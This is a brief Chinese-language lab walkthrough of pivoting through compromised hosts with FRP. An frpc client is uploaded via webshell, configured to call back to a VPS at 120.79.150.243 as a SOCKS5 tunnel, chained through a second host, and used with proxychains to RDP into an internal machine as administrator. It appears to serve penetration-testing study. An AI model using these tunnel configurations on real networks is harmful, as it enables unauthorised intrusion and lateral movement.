一、Socks代理实战二(FRP)

1.渗透场景

和Socks代理实战01一样

2.测试Target1

• 信息收集（同代理实战01）
• 分析利用（同代理实战01）
• 主机信息收集（同代理实战01）
• 建立Socks代理

FRP建立Socks代理

（1）VPS启动frps

# 启动frps
./frps -c frps.ini

# 查看frps配置文件
cat frps.ini

（2）Target1启动frpc

• 获取的webshell上传frpc
  
• 修改如下的frpc.ini配置文件

[common]
server_addr = 120.79.150.243
server_port = 7000

[socks5]
type = tcp
plugin = socks5
remote_port = 10998

• 给予frpc执行权限并执行

chmod +x frpc

./frpc -c frpc.ini

3.测试Target2

1）蚁剑开启代理

2）获得Target2（192.168.22.0/24网段）的webshell

3）FRP建立二层Socks代理

（1）修改frpc.ini配置文件（在原来的基础上添加代理转发，将本地的10089端口转发到vps的21000端口）

[common]
server_addr = 120.79.150.243
server_port = 7000

[socks5]
type = tcp
remote_port = 10998
plugin = socks5

[socks5_10998]
type = tcp
local_ip = 127.0.0.1
local_port = 10089
remote_port = 21000

（2）Target1启动frpc

./frpc -c frpc.ini

（3）Target1启动frps

./frps -c frps.ini

（4）Target2启动frpc

./frpc -c frpc.ini

4.测试Target3

进行rdp远程连接

1）修改proxychains4.conf配置文件

socks5 120.79.150.243 21000

2）尝试进行远程桌面连接

proxychains -q rdesktop -u administrator -p root 192.168.33.33 

5.总结

frp不够稳定